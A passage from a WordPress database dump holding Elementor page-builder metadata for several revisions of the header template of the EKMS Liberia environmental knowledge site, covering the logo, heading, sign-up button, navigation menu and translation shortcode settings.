:\"pagination_type\";i:1;}}s:5:\"style\";a:2:{s:28:\"custom_section_design_layout\";a:2:{s:17:\"custom_column_gap\";i:1;s:14:\"custom_row_gap\";i:1;}s:24:\"section_pagination_style\";a:2:{s:18:\"pagination_spacing\";i:1;s:22:\"pagination_spacing_top\";i:1;}}}}}'),(27889,91,'kava_extra_enable_breadcrumbs','inherit'),(27890,4048,'_elementor_edit_mode','builder'),(27891,4048,'_elementor_template_type','header'),(27892,4048,'_elementor_version','3.4.0'),(27893,4048,'_elementor_pro_version','3.3.6'),(27894,4048,'_wp_page_template','default'),(27895,4048,'_elementor_data','[{\"id\":\"226cf47\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"z_index\":10,\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"46f8c6a\"}]},\"elements\":[{\"id\":\"bb01e59\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"3363c15\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fa03357\"}],\"z_index\":10},\"elements\":[{\"id\":\"3569957\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":14.7690000000000001278976924368180334568023681640625},\"elements\":[{\"id\":\"7fbf46e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/ekms_logo.jpg\",\"id\":3950,\"alt\":\"\",\"source\":\"library\"},\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"e547e9d\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d99ac5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":62.9849999999999994315658113919198513031005859375},\"elements\":[{\"id\":\"21163b9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge <br>Management System\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Rubik\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"ed9ad02\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.91199999999999903366187936626374721527099609375,\"content_position\":\"center\",\"align\":\"center\",\"space_between_widgets\":5},\"elements\":[{\"id\":\"1871aba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Join us to help grow <br \\/>the EKMS Community<\\/p>\",\"align\":\"center\",\"text_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ece91c3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Signup, It\'s free!\",\"align\":\"center\",\"size\":\"xs\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"700\",\"background_color\":\"#10CD2AB8\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"c6086e6\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e9d09e5\"}]},\"elements\":[{\"id\":\"e0c2519\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"647b188\",\"elType\":\"widget\",\"settings\":{\"menu\":\"main_menu\",\"align_items\":\"left\",\"pointer\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"menu_typography_font_weight\":\"400\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#D1E4DD\",\"pointer_color_menu_item_hover\":\"#D1E4DD\",\"color_dropdown_item\":\"#0A3C11\",\"color_dropdown_item_hover\":\"#FFFFFF\",\"background_color_dropdown_item_hover\":\"#0A3C11\",\"custom_css\":\".sub-menu-toggle {display:none;}\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(27897,4048,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(27901,4049,'_elementor_edit_mode','builder'),(27902,4049,'_elementor_template_type','header'),(27903,4049,'_elementor_version','3.4.0'),(27904,4049,'_elementor_pro_version','3.3.6'),(27905,4049,'_wp_page_template','default'),(27906,4049,'_elementor_data','[{\"id\":\"226cf47\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"z_index\":10,\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"46f8c6a\"}]},\"elements\":[{\"id\":\"bb01e59\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"3363c15\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fa03357\"}],\"z_index\":10},\"elements\":[{\"id\":\"3569957\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":14.413000000000000255795384873636066913604736328125},\"elements\":[{\"id\":\"7fbf46e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/ekms_logo.jpg\",\"id\":3950,\"alt\":\"\",\"source\":\"library\"},\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"e547e9d\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d99ac5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":55.51599999999999823785401531495153903961181640625},\"elements\":[{\"id\":\"21163b9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge <br>Management System\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Rubik\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"ed9ad02\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":19.48400000000000176214598468504846096038818359375,\"content_position\":\"center\",\"align\":\"center\",\"space_between_widgets\":5},\"elements\":[{\"id\":\"1871aba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Join us to help grow <br \\/>the EKMS Community<\\/p>\",\"align\":\"center\",\"text_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ece91c3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Signup, It\'s free!\",\"align\":\"center\",\"size\":\"xs\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"700\",\"background_color\":\"#10CD2AB8\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"f28ff03\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":10.5589999999999992752464095246978104114532470703125},\"elements\":[{\"id\":\"aed2366\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/seal.png\",\"id\":440,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"c6086e6\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e9d09e5\"}]},\"elements\":[{\"id\":\"e0c2519\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"647b188\",\"elType\":\"widget\",\"settings\":{\"menu\":\"main_menu\",\"align_items\":\"left\",\"pointer\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"menu_typography_font_weight\":\"400\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#D1E4DD\",\"pointer_color_menu_item_hover\":\"#D1E4DD\",\"color_dropdown_item\":\"#0A3C11\",\"color_dropdown_item_hover\":\"#FFFFFF\",\"background_color_dropdown_item_hover\":\"#0A3C11\",\"custom_css\":\".sub-menu-toggle {display:none;}\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(38604,89,'_elementor_css','a:6:{s:4:\"time\";i:1770877490;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:2:{i:0;s:7:\"35b6f4d\";i:1;s:7:\"35b6f4d\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(27908,4049,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(27912,4050,'_elementor_edit_mode','builder'),(27913,4050,'_elementor_template_type','header'),(27914,4050,'_elementor_version','3.4.0'),(27915,4050,'_elementor_pro_version','3.3.6'),(27916,4050,'_wp_page_template','default'),(27917,4050,'_elementor_data','[{\"id\":\"226cf47\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"z_index\":10,\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"46f8c6a\"}]},\"elements\":[{\"id\":\"bb01e59\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"3363c15\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fa03357\"}],\"z_index\":10},\"elements\":[{\"id\":\"3569957\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":13.077999999999999403144101961515843868255615234375},\"elements\":[{\"id\":\"7fbf46e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/ekms_logo.jpg\",\"id\":3950,\"alt\":\"\",\"source\":\"library\"},\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"e547e9d\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d99ac5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":56.8509999999999990905052982270717620849609375},\"elements\":[{\"id\":\"21163b9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge <br>Management System\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Rubik\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"ed9ad02\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":20.995999999999998664179656771011650562286376953125,\"content_position\":\"center\",\"align\":\"center\",\"space_between_widgets\":5},\"elements\":[{\"id\":\"1871aba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Join us to help grow <br \\/>the EKMS Community<\\/p>\",\"align\":\"center\",\"text_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ece91c3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Signup, It\'s free!\",\"align\":\"center\",\"size\":\"xs\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"700\",\"background_color\":\"#10CD2AB8\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"f28ff03\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":9.047000000000000596855898038484156131744384765625},\"elements\":[{\"id\":\"aed2366\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/seal.png\",\"id\":440,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"c6086e6\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e9d09e5\"}]},\"elements\":[{\"id\":\"e0c2519\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"647b188\",\"elType\":\"widget\",\"settings\":{\"menu\":\"main_menu\",\"align_items\":\"left\",\"pointer\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"menu_typography_font_weight\":\"400\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#D1E4DD\",\"pointer_color_menu_item_hover\":\"#D1E4DD\",\"color_dropdown_item\":\"#0A3C11\",\"color_dropdown_item_hover\":\"#FFFFFF\",\"background_color_dropdown_item_hover\":\"#0A3C11\",\"custom_css\":\".sub-menu-toggle {display:none;}\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(27919,4050,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(27924,4051,'_elementor_edit_mode','builder'),(27925,4051,'_elementor_template_type','header'),(27926,4051,'_elementor_version','3.4.0'),(27927,4051,'_elementor_pro_version','3.3.6'),(27928,4051,'_wp_page_template','default'),(27929,4051,'_elementor_data','[{\"id\":\"226cf47\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"z_index\":10,\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"46f8c6a\"}]},\"elements\":[{\"id\":\"bb01e59\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"3363c15\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fa03357\"}],\"z_index\":10},\"elements\":[{\"id\":\"3569957\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":13.077999999999999403144101961515843868255615234375},\"elements\":[{\"id\":\"7fbf46e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/ekms_logo.jpg\",\"id\":3950,\"alt\":\"\",\"source\":\"library\"},\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"e547e9d\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d99ac5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":56.8509999999999990905052982270717620849609375},\"elements\":[{\"id\":\"21163b9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge <br>Management System\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Rubik\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"ed9ad02\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":20.995999999999998664179656771011650562286376953125,\"content_position\":\"center\",\"align\":\"center\",\"space_between_widgets\":5},\"elements\":[{\"id\":\"1871aba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Join us to help grow <br \\/>the EKMS Community<\\/p>\",\"align\":\"center\",\"text_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ece91c3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Signup, It\'s free!\",\"align\":\"center\",\"size\":\"xs\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"700\",\"background_color\":\"#10CD2AB8\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"f28ff03\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":9.047000000000000596855898038484156131744384765625},\"elements\":[{\"id\":\"aed2366\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/seal.png\",\"id\":440,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"c6086e6\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e9d09e5\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"e0c2519\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":85.230999999999994543031789362430572509765625},\"elements\":[{\"id\":\"647b188\",\"elType\":\"widget\",\"settings\":{\"menu\":\"main_menu\",\"align_items\":\"left\",\"pointer\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"menu_typography_font_weight\":\"400\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#D1E4DD\",\"pointer_color_menu_item_hover\":\"#D1E4DD\",\"color_dropdown_item\":\"#0A3C11\",\"color_dropdown_item_hover\":\"#FFFFFF\",\"background_color_dropdown_item_hover\":\"#0A3C11\",\"custom_css\":\".sub-menu-toggle {display:none;}\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"f95713d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":14.711999999999999744204615126363933086395263671875},\"elements\":[{\"id\":\"3c1f6ee\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[gtranslate]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(27931,4051,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(27937,4052,'_elementor_edit_mode','builder'),(27938,4052,'_elementor_template_type','header'),(27939,4052,'_elementor_version','3.4.0'),(27940,4052,'_elementor_pro_version','3.3.6'),(27941,4052,'_wp_page_template','default'),(27942,4052,'_elementor_data','[{\"id\":\"226cf47\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"z_index\":10,\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"46f8c6a\"}]},\"elements\":[{\"id\":\"bb01e59\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"3363c15\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fa03357\"}],\"z_index\":10},\"elements\":[{\"id\":\"3569957\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":13.077999999999999403144101961515843868255615234375},\"elements\":[{\"id\":\"7fbf46e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/ekms_logo.jpg\",\"id\":3950,\"alt\":\"\",\"source\":\"library\"},\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"e547e9d\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d99ac5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":56.8509999999999990905052982270717620849609375},\"elements\":[{\"id\":\"21163b9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge <br>Management System\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Rubik\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"ed9ad02\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":20.995999999999998664179656771011650562286376953125,\"content_position\":\"center\",\"align\":\"center\",\"space_between_widgets\":5},\"elements\":[{\"id\":\"1871aba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Join us to help grow <br \\/>the EKMS Community<\\/p>\",\"align\":\"center\",\"text_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ece91c3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Signup, It\'s free!\",\"align\":\"center\",\"size\":\"xs\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"700\",\"background_color\":\"#10CD2AB8\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"f28ff03\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":9.047000000000000596855898038484156131744384765625},\"elements\":[{\"id\":\"aed2366\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/seal.png\",\"id\":440,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"c6086e6\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e9d09e5\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"e0c2519\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":85.230999999999994543031789362430572509765625},\"elements\":[{\"id\":\"647b188\",\"elType\":\"widget\",\"settings\":{\"menu\":\"main_menu\",\"align_items\":\"left\",\"pointer\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"menu_typography_font_weight\":\"400\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#D1E4DD\",\"pointer_color_menu_item_hover\":\"#D1E4DD\",\"color_dropdown_item\":\"#0A3C11\",\"color_dropdown_item_hover\":\"#FFFFFF\",\"background_color_dropdown_item_hover\":\"#0A3C11\",\"custom_css\":\".sub-menu-toggle {display:none;}\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"f95713d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":14.711999999999999744204615126363933086395263671875,\"content_position\":\"center\",\"text_align\":\"center\"},\"elements\":[{\"id\":\"3c1f6ee\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[gtranslate]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(27944,4052,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(27948,4053,'_elementor_edit_mode','builder'),(27949,4053,'_elementor_template_type','header'),(27950,4053,'_elementor_version','3.4.0'),(27951,4053,'_elementor_pro_version','3.3.6'),(27952,4053,'_wp_page_template','default'),(27953,4053,'_elementor_data','[{\"id\":\"226cf47\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"z_index\":10,\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"46f8c6a\"}]},\"elements\":[{\"id\":\"bb01e59\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"3363c15\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fa03357\"}],\"z_index\":10},\"elements\":[{\"id\":\"3569957\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":13.077999999999999403144101961515843868255615234375},\"elements\":[{\"id\":\"7fbf46e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/ekms_logo.jpg\",\"id\":3950,\"alt\":\"\",\"source\":\"library\"},\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"e547e9d\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d99ac5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":56.8509999999999990905052982270717620849609375},\"elements\":[{\"id\":\"21163b9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge <br>Management System\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Rubik\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"ed9ad02\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":20.995999999999998664179656771011650562286376953125,\"content_position\":\"center\",\"align\":\"center\",\"space_between_widgets\":5},\"elements\":[{\"id\":\"1871aba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Join us to help grow <br \\/>the EKMS 